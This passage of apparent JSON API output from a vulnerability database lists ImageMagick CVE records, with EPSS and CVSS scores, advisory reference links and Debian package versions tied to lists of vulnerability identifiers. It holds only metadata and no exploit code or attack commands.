"value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51124", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51176", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51201", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51159", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51214", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.5121", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51254", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51233", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51219", "published_at": "2026-04-13T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51257", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51264", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.51242", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00278", "scoring_system": "epss", "scoring_elements": "0.5119", "published_at": "2026-04-24T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2020-13902" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13902", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13902" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1849028", "reference_id": "1849028", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1849028" }, { "reference_url": "https://security.archlinux.org/ASA-202006-14", "reference_id": "ASA-202006-14", "reference_type": "", "scores": [], "url": "https://security.archlinux.org/ASA-202006-14" }, { "reference_url": "https://security.archlinux.org/AVG-1181", "reference_id": "AVG-1181", "reference_type": "", "scores": [ { "value": "Medium", "scoring_system": "archlinux", "scoring_elements": "" } ], "url": "https://security.archlinux.org/AVG-1181" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2020-13902" ], "risk_score": 3.2, "exploitability": "0.5", "weighted_severity": "6.4", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-wwcs-2mw8-4bbr" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82841?format=api", "vulnerability_id": "VCID-x95w-ad3j-n7aj", "summary": "ImageMagick: Memory leak in the ReadSIXELImage function in coders/sixel.c", "references": [ { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-7396.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-7396.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87264", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87347", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87331", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87335", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.8733", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87274", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.8729", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87288", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87307", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87314", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87327", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87321", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.03348", "scoring_system": "epss", "scoring_elements": "0.87317", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7395" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7396" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" }, { "reference_url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/commit/748a03651e5b138bcaf160d15133de2f4b1b89ce", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/commit/748a03651e5b138bcaf160d15133de2f4b1b89ce" }, { "reference_url": "https://github.com/ImageMagick/ImageMagick/issues/1452", "reference_id": "", "reference_type": "", "scores": [], "url": "https://github.com/ImageMagick/ImageMagick/issues/1452" }, { "reference_url": "https://www.debian.org/security/2020/dsa-4712", "reference_id": "", "reference_type": "", "scores": [], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "reference_url": "http://www.securityfocus.com/bid/106849", "reference_id": "", "reference_type": "", "scores": [], "url": "http://www.securityfocus.com/bid/106849" }, { "reference_url": "https://bugzilla.redhat.com/show_bug.cgi?id=1672567", "reference_id": "1672567", "reference_type": "", "scores": [], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1672567" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:18.10:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_id": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7396", "reference_id": "CVE-2019-7396", "reference_type": "", "scores": [ { "value": "5.0", "scoring_system": "cvssv2", "scoring_elements": "AV:N/AC:L/Au:N/C:N/I:N/A:P" }, { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-7396" }, { "reference_url": "https://usn.ubuntu.com/4034-1/", "reference_id": "USN-4034-1", "reference_type": "", "scores": [], "url": "https://usn.ubuntu.com/4034-1/" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": 